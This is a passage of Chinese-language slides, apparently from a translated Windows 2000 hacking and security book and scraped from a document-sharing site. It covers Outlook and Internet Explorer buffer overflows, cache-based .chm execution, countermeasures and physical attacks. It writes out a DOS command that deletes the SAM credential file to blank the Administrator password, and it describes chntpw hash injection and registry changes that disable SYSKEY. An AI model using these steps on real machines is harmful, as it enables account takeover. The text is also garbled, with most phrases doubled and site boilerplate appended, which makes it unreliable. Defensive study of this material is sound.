35、的一個(gè)手段上當(dāng)受騙的一個(gè)手段Email HackingEmail Hacking使用管道將這個(gè)文件輸入給使用管道將這個(gè)文件輸入給netcat,并發(fā)送給開(kāi)放的,并發(fā)送給開(kāi)放的SMTP效勞器,效勞器,就能夠向發(fā)送一封就能夠向發(fā)送一封HTML格式的消息,并包含附件格式的消息,并包含附件plant.txt要更好地理解多局部消息中的要更好地理解多局部消息中的MIME邊界,參考邊界,參考RFC 2046的第的第5.1.1節(jié)。在節(jié)。在Outlook Express中對(duì)收到的消息進(jìn)行研究,也可以進(jìn)一中對(duì)收到的消息進(jìn)行研究,也可以進(jìn)一步了解其格式步了解其格式單擊單擊Properties | Details |
36、Message Source就可以查看原始數(shù)據(jù)就可以查看原始數(shù)據(jù)(Outlook不允許查看全部的原始不允許查看全部的原始SMTP數(shù)據(jù)數(shù)據(jù))緩沖區(qū)溢出緩沖區(qū)溢出如果在每天使用的軟件如果在每天使用的軟件電子郵件客戶端中存在緩沖區(qū)溢出的漏洞,那么電子郵件客戶端中存在緩沖區(qū)溢出的漏洞,那么問(wèn)題就很可怕了。在漏洞得到修正之前,任何使用存在問(wèn)題的軟件的人都將問(wèn)題就很可怕了。在漏洞得到修正之前,任何使用存在問(wèn)題的軟件的人都將成為目標(biāo)成為目標(biāo)2000年年7月月18日;日;Underground Security Systems Research(USSR)公布了公布了GMT令牌緩沖區(qū)溢出漏洞,令牌緩沖區(qū)溢出漏
37、洞,Outlook和和Outlook Express(OE)的用戶的用戶隨之發(fā)現(xiàn)了這一點(diǎn)。通過(guò)將隨之發(fā)現(xiàn)了這一點(diǎn)。通過(guò)將GMT令牌放在郵件消息的日期字段中并寫(xiě)入一個(gè)令牌放在郵件消息的日期字段中并寫(xiě)入一個(gè)超長(zhǎng)的值,超長(zhǎng)的值,Outlook和和OE就會(huì)在就會(huì)在POP3和和IMAP4下載這樣的消息時(shí)崩潰。下載這樣的消息時(shí)崩潰。如果可以發(fā)送精心設(shè)計(jì)的日期字段,攻擊者選定的程序就可以封裝在如果可以發(fā)送精心設(shè)計(jì)的日期字段,攻擊者選定的程序就可以封裝在GMT值值中并執(zhí)行中并執(zhí)行Outlook用戶需要預(yù)覽、閱讀、回復(fù)或轉(zhuǎn)發(fā)這樣的消息;用戶需要預(yù)覽、閱讀、回復(fù)或轉(zhuǎn)發(fā)這樣的消息;OE用戶簡(jiǎn)單地翻開(kāi)用戶簡(jiǎn)單地翻開(kāi)含
38、有該消息的文件夾,在消息處理時(shí)就會(huì)自動(dòng)發(fā)生含有該消息的文件夾,在消息處理時(shí)就會(huì)自動(dòng)發(fā)生OE就會(huì)永久性地崩就會(huì)永久性地崩潰,除非去除郵箱潰,除非去除郵箱Outlook/OE vCard緩沖區(qū)溢緩沖區(qū)溢出出這個(gè)問(wèn)題最早由這個(gè)問(wèn)題最早由Joel Moses發(fā)現(xiàn),通過(guò)翻開(kāi)特定字段中含發(fā)現(xiàn),通過(guò)翻開(kāi)特定字段中含有大量文本數(shù)據(jù)的有大量文本數(shù)據(jù)的vCards,就可以利用,就可以利用Internet Explorer中的緩沖區(qū)溢出中的緩沖區(qū)溢出vCards是是1996年創(chuàng)造的一種電子名片格式,年創(chuàng)造的一種電子名片格式,1998年進(jìn)年進(jìn)入入RFCvCards以以.vcf為文件擴(kuò)展名。因?yàn)樵谧x取為文件擴(kuò)展名。因?yàn)?/p>
39、在讀取vCards時(shí)必須解時(shí)必須解析大量的數(shù)據(jù)字段,因此它們成為緩沖區(qū)溢出攻擊的最正析大量的數(shù)據(jù)字段,因此它們成為緩沖區(qū)溢出攻擊的最正確目標(biāo)確目標(biāo)Outlook/OE vCard緩沖區(qū)溢緩沖區(qū)溢出出盡管受害者必須顯式地運(yùn)行盡管受害者必須顯式地運(yùn)行vCard,但由于它是一種方便,但由于它是一種方便的個(gè)人數(shù)據(jù)交換格式,因此大多數(shù)人都不會(huì)有任何的猶豫的個(gè)人數(shù)據(jù)交換格式,因此大多數(shù)人都不會(huì)有任何的猶豫在默認(rèn)情況下,在默認(rèn)情況下,Outlook會(huì)直接從郵件附件運(yùn)行會(huì)直接從郵件附件運(yùn)行vCards而而不對(duì)用戶進(jìn)行提示,除非安裝了不對(duì)用戶進(jìn)行提示,除非安裝了Office平安更新。在直接平安更新。在直接翻開(kāi)磁
40、盤(pán)上的翻開(kāi)磁盤(pán)上的.vcf文件時(shí),不會(huì)出現(xiàn)提示文件時(shí),不會(huì)出現(xiàn)提示Outlook/OE vCard緩沖區(qū)溢緩沖區(qū)溢出出vCards采用非常簡(jiǎn)單的采用非常簡(jiǎn)單的ASCII結(jié)構(gòu),下面的例子是一個(gè)名結(jié)構(gòu),下面的例子是一個(gè)名為為John Doe.vcf的的vCard(為了簡(jiǎn)明起見(jiàn),刪除了一些可為了簡(jiǎn)明起見(jiàn),刪除了一些可選的字段選的字段):Outlook/OE vCard緩沖區(qū)溢緩沖區(qū)溢出出如果可選的如果可選的BDAY(生日生日)字段超過(guò)字段超過(guò)55個(gè)字符,運(yùn)行它就會(huì)導(dǎo)致個(gè)字符,運(yùn)行它就會(huì)導(dǎo)致Outlook終止并溢出終止并溢出含有大量文本數(shù)據(jù)的含有大量文本數(shù)據(jù)的EMAIL字段也會(huì)導(dǎo)致同樣的結(jié)果,而在字段
41、也會(huì)導(dǎo)致同樣的結(jié)果,而在N(姓名姓名)字段中填入大量的文本數(shù)據(jù)會(huì)導(dǎo)致字段中填入大量的文本數(shù)據(jù)會(huì)導(dǎo)致Outlook占用占用99%的系統(tǒng)的系統(tǒng)CPU資資源源主要的問(wèn)題似乎在于主要的問(wèn)題似乎在于Outlook的地址簿,它在試圖從的地址簿,它在試圖從vCard導(dǎo)入超長(zhǎng)導(dǎo)入超長(zhǎng)的字段時(shí)發(fā)生阻塞。用戶將存在問(wèn)題的的字段時(shí)發(fā)生阻塞。用戶將存在問(wèn)題的vCard復(fù)制到他們的復(fù)制到他們的Outlook/OE的聯(lián)系人文件夾中,通過(guò)的聯(lián)系人文件夾中,通過(guò)Windows資源管理器,或通資源管理器,或通過(guò)嵌入在過(guò)嵌入在Web頁(yè)面或電子郵件消息中的鏈接翻開(kāi)它時(shí),也會(huì)發(fā)生問(wèn)題頁(yè)面或電子郵件消息中的鏈接翻開(kāi)它時(shí),也會(huì)發(fā)生問(wèn)題其
42、它緩沖區(qū)溢出其它緩沖區(qū)溢出Windows媒體播放器媒體播放器.asx緩沖區(qū)溢出緩沖區(qū)溢出Georgi Guninski和和Richard Smith發(fā)現(xiàn)的發(fā)現(xiàn)的ActiveX“Safe for Scripting腳本平安問(wèn)題腳本平安問(wèn)題Access數(shù)據(jù)庫(kù)實(shí)例化數(shù)據(jù)庫(kù)實(shí)例化IE 5中執(zhí)行中執(zhí)行VBA代碼代碼寫(xiě)本地文件寫(xiě)本地文件將文件寫(xiě)入本地磁盤(pán),如果能夠?qū)懭肴我獾奈募缓笥帜軌驁?zhí)行它們,將文件寫(xiě)入本地磁盤(pán),如果能夠?qū)懭肴我獾奈募缓笥帜軌驁?zhí)行它們,那么麻煩就大了。如果文件已經(jīng)寫(xiě)入到磁盤(pán)上,那么只有文件系統(tǒng)那么麻煩就大了。如果文件已經(jīng)寫(xiě)入到磁盤(pán)上,那么只有文件系統(tǒng)ACL和它們與用戶賬戶權(quán)限的交集能
43、夠確定哪些能夠被執(zhí)行而哪些不和它們與用戶賬戶權(quán)限的交集能夠確定哪些能夠被執(zhí)行而哪些不能,因此只要過(guò)了第一關(guān),第二步就很容易了。能,因此只要過(guò)了第一關(guān),第二步就很容易了。這種攻擊的一種聰明的變種是識(shí)別磁盤(pán)上可以可靠地寫(xiě)入數(shù)據(jù)的靜態(tài)這種攻擊的一種聰明的變種是識(shí)別磁盤(pán)上可以可靠地寫(xiě)入數(shù)據(jù)的靜態(tài)位置位置例如,例如,Internet臨時(shí)緩存文件的名稱和位置是可以預(yù)測(cè)的。臨時(shí)緩存文件的名稱和位置是可以預(yù)測(cè)的。這使得攻擊者可以實(shí)現(xiàn)這使得攻擊者可以實(shí)現(xiàn)“選定文件內(nèi)容攻擊,在文件里面他們可以選定文件內(nèi)容攻擊,在文件里面他們可以精心設(shè)計(jì)惡意的腳本或是其他提交給精心設(shè)計(jì)惡意的腳本或是其他提交給Internet客戶端
44、的指令,以便可客戶端的指令,以便可以寫(xiě)入到這些可預(yù)測(cè)的位置之一。一旦完成了這一步,那么通過(guò)以寫(xiě)入到這些可預(yù)測(cè)的位置之一。一旦完成了這一步,那么通過(guò)IFRAME或其他的技術(shù)從的位置執(zhí)行這些腳本就很容易了或其他的技術(shù)從的位置執(zhí)行這些腳本就很容易了執(zhí)行被寫(xiě)入臨時(shí)執(zhí)行被寫(xiě)入臨時(shí)Internet緩存的緩存的.chm文文件件Georgi Guninski的第的第28號(hào)公告描述了這個(gè)漏洞。它涉及號(hào)公告描述了這個(gè)漏洞。它涉及到到4個(gè)根本的步驟,它們都是在個(gè)根本的步驟,它們都是在IE或或Outlook/OE中裝載中裝載HTML時(shí)進(jìn)行的:時(shí)進(jìn)行的:1.使用一些使用一些HTML代碼,向代碼,向IE的的Interne
45、t臨時(shí)文件緩存臨時(shí)文件緩存中寫(xiě)入一系列相同的經(jīng)過(guò)特殊設(shè)計(jì)的已編譯中寫(xiě)入一系列相同的經(jīng)過(guò)特殊設(shè)計(jì)的已編譯HTML幫助文幫助文件件(.chm)2.從第一份從第一份HTML文檔中,裝載第二份文檔中,裝載第二份HTML文檔,第文檔,第二份文檔位于另一臺(tái)效勞器上,該效勞器的名稱與存放父二份文檔位于另一臺(tái)效勞器上,該效勞器的名稱與存放父文檔的效勞器的名稱不同文檔的效勞器的名稱不同3.識(shí)別識(shí)別Internet臨時(shí)緩存文件夾的位置臨時(shí)緩存文件夾的位置4.在查點(diǎn)出的緩存文件夾中執(zhí)行在查點(diǎn)出的緩存文件夾中執(zhí)行.chm文件文件通用對(duì)策通用對(duì)策仔細(xì)配置出站網(wǎng)關(guān)訪問(wèn)控制,阻塞除由公司策略明顯允許仔細(xì)配置出站網(wǎng)關(guān)訪問(wèn)控制
46、,阻塞除由公司策略明顯允許的通信之外的全部通信??蛻舳斯舻淖羁膳碌囊环N可能的通信之外的全部通信??蛻舳斯舻淖羁膳碌囊环N可能就是調(diào)用與惡意效勞器之間的出站連接在不平安的協(xié)議上,就是調(diào)用與惡意效勞器之間的出站連接在不平安的協(xié)議上,例如例如telnet或或SMB不要在重要的效勞器不要在重要的效勞器上讀取郵件或?yàn)g覽上讀取郵件或?yàn)g覽Web不要在重要的效勞器上安裝不要在重要的效勞器上安裝Microsoft Office在瀏覽在瀏覽Web和讀取郵件時(shí),盡可能使用非特權(quán)用戶身份,和讀取郵件時(shí),盡可能使用非特權(quán)用戶身份,而不要用而不要用Administrator通用對(duì)策通用對(duì)策堅(jiān)持原那么堅(jiān)持原那么不要點(diǎn)擊不
47、可信的鏈接或查看不可信的電子郵不要點(diǎn)擊不可信的鏈接或查看不可信的電子郵件附件,最好將其刪除件附件,最好將其刪除一定要及時(shí)升級(jí)一定要及時(shí)升級(jí)Internet客戶端軟件。目前,使用客戶端軟件。目前,使用Windows更新站點(diǎn)來(lái)自動(dòng)檢測(cè)和安裝你需要的補(bǔ)丁更新站點(diǎn)來(lái)自動(dòng)檢測(cè)和安裝你需要的補(bǔ)丁(Microsoft方案在方案在2001年夏天推出一個(gè)新的工具,以幫助用戶確定他們的年夏天推出一個(gè)新的工具,以幫助用戶確定他們的IE/OE和和Outlook需要安裝哪些補(bǔ)丁需要安裝哪些補(bǔ)丁)。在編寫(xiě)本書(shū)時(shí),。在編寫(xiě)本書(shū)時(shí),IE 5.5是是Microsoft的核心的核心Internet客戶端的最新版本,并且客戶端的最
48、新版本,并且Service Pack 1也已經(jīng)發(fā)布。在也已經(jīng)發(fā)布。在IE中,檢查中,檢查Help|About以查看已經(jīng)安以查看已經(jīng)安裝了哪些補(bǔ)丁,并且確保你正在使用裝了哪些補(bǔ)丁,并且確保你正在使用128位加密強(qiáng)度位加密強(qiáng)度通用對(duì)策通用對(duì)策不要忘了及時(shí)到不要忘了及時(shí)到Office更新站點(diǎn)上對(duì)更新站點(diǎn)上對(duì)Office進(jìn)行更新。特別進(jìn)行更新。特別的,確保你已經(jīng)安裝了的,確保你已經(jīng)安裝了Outlook電子郵件平安更新電子郵件平安更新適當(dāng)?shù)脑O(shè)置適當(dāng)?shù)脑O(shè)置IE的的 Security Zone,包括禁用,包括禁用Restricted Site區(qū)域中的全部功能,然后配置區(qū)域中的全部功能,然后配置Outlook
49、/OE使用該區(qū)域使用該區(qū)域讀取電子郵件讀取電子郵件將平安策略中的將平安策略中的Windows 2000 LAN Manager認(rèn)證級(jí)別認(rèn)證級(jí)別設(shè)置為設(shè)置為Send NTLMv2 Response Only。這能夠降低對(duì)。這能夠降低對(duì)SMB認(rèn)證進(jìn)行竊聽(tīng)攻擊的危險(xiǎn)認(rèn)證進(jìn)行竊聽(tīng)攻擊的危險(xiǎn)(但不能阻止惡意效勞器和但不能阻止惡意效勞器和MITM攻擊攻擊)通用對(duì)策通用對(duì)策禁用禁用Windows 2000 telnet客戶端的客戶端的NTLM認(rèn)證認(rèn)證(在命令在命令行中執(zhí)行行中執(zhí)行telnet命令,然后輸入命令,然后輸入unset ntlm,然后用,然后用quit退出退出)。這能夠防止在對(duì)。這能夠防止在對(duì)te
50、lnet:/鏈接進(jìn)行反響時(shí)鏈接進(jìn)行反響時(shí)NTLM憑據(jù)在網(wǎng)絡(luò)上傳播憑據(jù)在網(wǎng)絡(luò)上傳播在所有的在所有的Office應(yīng)用程序的應(yīng)用程序的Tools | Macro | Security中中將宏平安性設(shè)置為將宏平安性設(shè)置為High(高高)。這有助于防止。這有助于防止Office文檔中文檔中的惡意宏腳本進(jìn)行的攻擊的惡意宏腳本進(jìn)行的攻擊通用對(duì)策通用對(duì)策在客戶端和郵件效勞器上,及時(shí)更新防病毒標(biāo)識(shí)數(shù)據(jù)庫(kù)在客戶端和郵件效勞器上,及時(shí)更新防病毒標(biāo)識(shí)數(shù)據(jù)庫(kù)部署基于網(wǎng)關(guān)和郵件效勞器的過(guò)濾系統(tǒng),剔除部署基于網(wǎng)關(guān)和郵件效勞器的過(guò)濾系統(tǒng),剔除Web頁(yè)面頁(yè)面和電子郵件中的惡意內(nèi)容和電子郵件中的惡意內(nèi)容如果這些提示沒(méi)能使你感到平
51、安,那么不要再使用如果這些提示沒(méi)能使你感到平安,那么不要再使用Microsoft Internet客戶端客戶端(如果你運(yùn)行如果你運(yùn)行Windows 2000,那么實(shí)際上這是不可能的,那么實(shí)際上這是不可能的)目目 錄錄IIS5的平安的平安終端效勞器平安終端效勞器平安Microsoft Internet 客戶端客戶端的平安的平安物理攻擊物理攻擊拒絕效勞攻擊拒絕效勞攻擊平安功能和工具平安功能和工具物理攻擊物理攻擊如果入侵者能夠不受限制地在物理上訪問(wèn)一臺(tái)如果入侵者能夠不受限制地在物理上訪問(wèn)一臺(tái)Windows 2000系統(tǒng),那么他們?nèi)绾芜M(jìn)行攻擊呢?系統(tǒng),那么他們?nèi)绾芜M(jìn)行攻擊呢?本節(jié)將從物理的角度探討攻擊
52、者如何從本節(jié)將從物理的角度探討攻擊者如何從Windows 2000獲取數(shù)據(jù),通常的方法是引導(dǎo)到另外的操作系統(tǒng)并在離獲取數(shù)據(jù),通常的方法是引導(dǎo)到另外的操作系統(tǒng)并在離線的狀態(tài)下對(duì)系統(tǒng)的屬性進(jìn)行編輯線的狀態(tài)下對(duì)系統(tǒng)的屬性進(jìn)行編輯對(duì)對(duì)SAM進(jìn)行離線攻擊進(jìn)行離線攻擊破解通常依賴于獲取破解通常依賴于獲取NT/2000的密碼數(shù)據(jù)庫(kù)的密碼數(shù)據(jù)庫(kù)平安平安賬戶管理器賬戶管理器(Security Accounts Manager,SAM)文件文件通過(guò)離線攻擊,通過(guò)離線攻擊,SAM的內(nèi)容也可以被壞人獲取,只需引的內(nèi)容也可以被壞人獲取,只需引導(dǎo)到另一種操作系統(tǒng),然后將導(dǎo)到另一種操作系統(tǒng),然后將SAM復(fù)制到可移動(dòng)媒體或復(fù)
53、制到可移動(dòng)媒體或網(wǎng)絡(luò)共享中網(wǎng)絡(luò)共享中首先介紹一些經(jīng)典的離線攻擊技術(shù),然后分析這些攻擊首先介紹一些經(jīng)典的離線攻擊技術(shù),然后分析這些攻擊對(duì)對(duì)EFS潛在的影響。最后,討論潛在的影響。最后,討論EFS攻擊的一個(gè)例子,它攻擊的一個(gè)例子,它不需要在離線狀態(tài)下訪問(wèn)系統(tǒng)不需要在離線狀態(tài)下訪問(wèn)系統(tǒng)通過(guò)刪除通過(guò)刪除SAM廢除廢除Administrator密密碼碼通過(guò)在系統(tǒng)處于離線狀態(tài)時(shí)刪除通過(guò)在系統(tǒng)處于離線狀態(tài)時(shí)刪除SAM文件,然后就可以文件,然后就可以在系統(tǒng)重新啟動(dòng)后以空密碼登錄在系統(tǒng)重新啟動(dòng)后以空密碼登錄Administrator賬戶。賬戶。這種方法同時(shí)也刪除了目標(biāo)系統(tǒng)上所有現(xiàn)有的用戶賬戶,這種方法同時(shí)也刪除
54、了目標(biāo)系統(tǒng)上所有現(xiàn)有的用戶賬戶,但與磁盤(pán)上的重要數(shù)據(jù)相比,攻擊者并不考慮這一點(diǎn)但與磁盤(pán)上的重要數(shù)據(jù)相比,攻擊者并不考慮這一點(diǎn)這種攻擊有多種實(shí)現(xiàn)方式,但最直接的方法是制作一張這種攻擊有多種實(shí)現(xiàn)方式,但最直接的方法是制作一張可 引 導(dǎo) 的可 引 導(dǎo) 的 D O S 系 統(tǒng) 軟 盤(pán) , 并 將系 統(tǒng) 軟 盤(pán) , 并 將 S y s i n t e r n a l 的的ntfsdospro復(fù)制到軟盤(pán)上。然后這張軟盤(pán)就可以用來(lái)將復(fù)制到軟盤(pán)上。然后這張軟盤(pán)就可以用來(lái)將目標(biāo)系統(tǒng)引導(dǎo)到目標(biāo)系統(tǒng)引導(dǎo)到DOS通過(guò)刪除通過(guò)刪除SAM廢除廢除Administrator密密碼碼如果目標(biāo)系統(tǒng)使用如果目標(biāo)系統(tǒng)使用FAT或或
55、FAT32,那么只需輸入以下命,那么只需輸入以下命令就可以刪除令就可以刪除SAM文件:文件: A:del c:winntsystem32configsam如果目標(biāo)系統(tǒng)使用如果目標(biāo)系統(tǒng)使用NTFS文件系統(tǒng),那么可以使用文件系統(tǒng),那么可以使用ntfsdospro將將NTFS卷裝載到卷裝載到DOS中,然后使用相同的中,然后使用相同的命令來(lái)刪除命令來(lái)刪除SAM通過(guò)刪除通過(guò)刪除SAM廢除廢除Administrator密密碼碼當(dāng)系統(tǒng)稍后重新啟動(dòng)時(shí),當(dāng)系統(tǒng)稍后重新啟動(dòng)時(shí),Windows 2000將重新創(chuàng)立一將重新創(chuàng)立一個(gè)默認(rèn)的個(gè)默認(rèn)的SAM文件,它含有文件,它含有Administrator賬戶,而且賬戶,而
56、且密碼為空。只需使用這個(gè)賬戶和密碼登錄,就可以獲得密碼為空。只需使用這個(gè)賬戶和密碼登錄,就可以獲得對(duì)系統(tǒng)的全面控制對(duì)系統(tǒng)的全面控制這里需要注意的是,刪除這里需要注意的是,刪除SAM并不會(huì)影響并不會(huì)影響Windows 2000域控制器,因?yàn)樗鼈儧](méi)有把密碼散列保存在域控制器,因?yàn)樗鼈儧](méi)有把密碼散列保存在SAM中。然而,中。然而,Grace和和Bartlett的文章指出了一種方法,通的文章指出了一種方法,通過(guò)在域控制器上安裝另一份過(guò)在域控制器上安裝另一份Windows 2000,就可以獲,就可以獲得根本相同的效果得根本相同的效果通過(guò)使用通過(guò)使用chntpw對(duì)對(duì)SAM進(jìn)行散列注進(jìn)行散列注入入如果你希望
57、使用更為成熟的物理攻擊方法,不想如果你希望使用更為成熟的物理攻擊方法,不想破壞掉系統(tǒng)中全部的賬戶,可以使用一張破壞掉系統(tǒng)中全部的賬戶,可以使用一張Linux引導(dǎo)軟盤(pán)和引導(dǎo)軟盤(pán)和Petter Nordahl-Hagen的的chntpw,在離線狀態(tài)將密碼散列注入到在離線狀態(tài)將密碼散列注入到SAM中中即使在應(yīng)用了即使在應(yīng)用了SYSKEY時(shí),或即使選擇了用密碼時(shí),或即使選擇了用密碼來(lái)保護(hù)來(lái)保護(hù)SYSKEY或?qū)⑺4嬖谲洷P(pán)上的選項(xiàng),注或?qū)⑺4嬖谲洷P(pán)上的選項(xiàng),注入仍然能夠奏效!入仍然能夠奏效!通過(guò)使用通過(guò)使用chntpw對(duì)對(duì)SAM進(jìn)行散列注進(jìn)行散列注入入Petter說(shuō)明了如何將說(shuō)明了如何將SYSKEY關(guān)
58、閉。更糟的是,他關(guān)閉。更糟的是,他發(fā)現(xiàn)攻擊者并不需要這樣做發(fā)現(xiàn)攻擊者并不需要這樣做只需將舊的、未只需將舊的、未經(jīng)經(jīng)SYSKEY處理的散列直接注入到處理的散列直接注入到SAM中,在重中,在重新啟動(dòng)后,它就會(huì)自動(dòng)被轉(zhuǎn)換為新啟動(dòng)后,它就會(huì)自動(dòng)被轉(zhuǎn)換為SYSKEY散列散列關(guān)閉關(guān)閉SYSKEY的方法的方法1.將將HKLMSystemCurrentControlSetControlLsaSecureBoot設(shè)置為設(shè)置為0以禁用以禁用SYSKEY(這個(gè)鍵的可能取值為:這個(gè)鍵的可能取值為:0禁用;禁用;1不受保護(hù)的密鑰保存在注冊(cè)表中;不受保護(hù)的密鑰保存在注冊(cè)表中;2密鑰保存在注冊(cè)表中,受密碼密鑰保存在注冊(cè)表中
59、,受密碼保護(hù);保護(hù);3密鑰保存在軟盤(pán)上密鑰保存在軟盤(pán)上)2. 將二進(jìn)制結(jié)構(gòu)將二進(jìn)制結(jié)構(gòu)HKLMSAMDomainsAccountF中的一個(gè)特殊標(biāo)志中的一個(gè)特殊標(biāo)志位修改為以前位修改為以前SecureBoot的相同模式。在系統(tǒng)處于運(yùn)行狀態(tài)時(shí),這個(gè)的相同模式。在系統(tǒng)處于運(yùn)行狀態(tài)時(shí),這個(gè)主鍵是不能訪問(wèn)的主鍵是不能訪問(wèn)的3.在在Windows 2000中,中,HKLMsecurityPolicyPolSecretEncryptionKey 主主鍵也需要被修改為與以前的兩個(gè)主鍵相同的值鍵也需要被修改為與以前的兩個(gè)主鍵相同的值通過(guò)使用通過(guò)使用chntpw對(duì)對(duì)SAM進(jìn)行散列注進(jìn)行散列注入入根據(jù)根據(jù)Pette
60、r的說(shuō)法,在的說(shuō)法,在NT 4 SP6之前的系統(tǒng)上之前的系統(tǒng)上只修改前兩個(gè)值中的一個(gè)會(huì)導(dǎo)致在完全引導(dǎo)之后出只修改前兩個(gè)值中的一個(gè)會(huì)導(dǎo)致在完全引導(dǎo)之后出現(xiàn)一個(gè)警告,指出現(xiàn)一個(gè)警告,指出SAM和系統(tǒng)設(shè)置之間的不一致和系統(tǒng)設(shè)置之間的不一致性,性,SYSKEY會(huì)被重新啟用。而在會(huì)被重新啟用。而在Windows 2000上,在重新啟動(dòng)之后,這上,在重新啟動(dòng)之后,這3個(gè)鍵值之間的不個(gè)鍵值之間的不一致似乎直接被重置為最可能的值一致似乎直接被重置為最可能的值目目 錄錄IIS5的平安的平安終端效勞器平安終端效勞器平安Microsoft Internet 客戶端客戶端的平安的平安物理攻擊物理攻擊拒絕效勞攻擊拒絕效勞攻擊平安功能
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- GB/T 45230-2025數(shù)據(jù)安全技術(shù)機(jī)密計(jì)算通用框架
- 借用林地協(xié)議合同范本
- 包裝紙盒合同范本
- 北京車輛過(guò)戶合同范本
- 軍事拓展協(xié)議合同范本
- 企業(yè)價(jià)值咨詢合同范本
- 動(dòng)產(chǎn)個(gè)人抵押合同范本
- 人工勞務(wù)外包合同范本
- 企業(yè)綠化合同范本
- 農(nóng)業(yè)機(jī)械改裝項(xiàng)目合同范例
- 《鍋爐原理》試題庫(kù)及參考答案(學(xué)習(xí)資料)
- 防呆防錯(cuò)十大原理及案例分析
- 區(qū)塊鏈金融發(fā)展的現(xiàn)狀、挑戰(zhàn)與前景
- 秒的認(rèn)識(shí) 全國(guó)公開(kāi)課一等獎(jiǎng)
- 電工基礎(chǔ)(第五版) 課件全套 白乃平 第1-9章 電路的基本概念和基本定律- 磁路與鐵芯線圈+附錄 常用電工儀表簡(jiǎn)介
- ct增強(qiáng)掃描中造影劑外滲課件
- 苗木采購(gòu)服務(wù)方案以及售后服務(wù)方案2
- 《汽車發(fā)動(dòng)機(jī)構(gòu)造與維修》教案-
- 2021年陜西西安亮麗電力集團(tuán)有限責(zé)任公司招聘筆試試題
- 高中英語(yǔ)-Studying abroad教學(xué)課件設(shè)計(jì)
- 6kvfc真空接觸器試驗(yàn)報(bào)告
評(píng)論
0/150
提交評(píng)論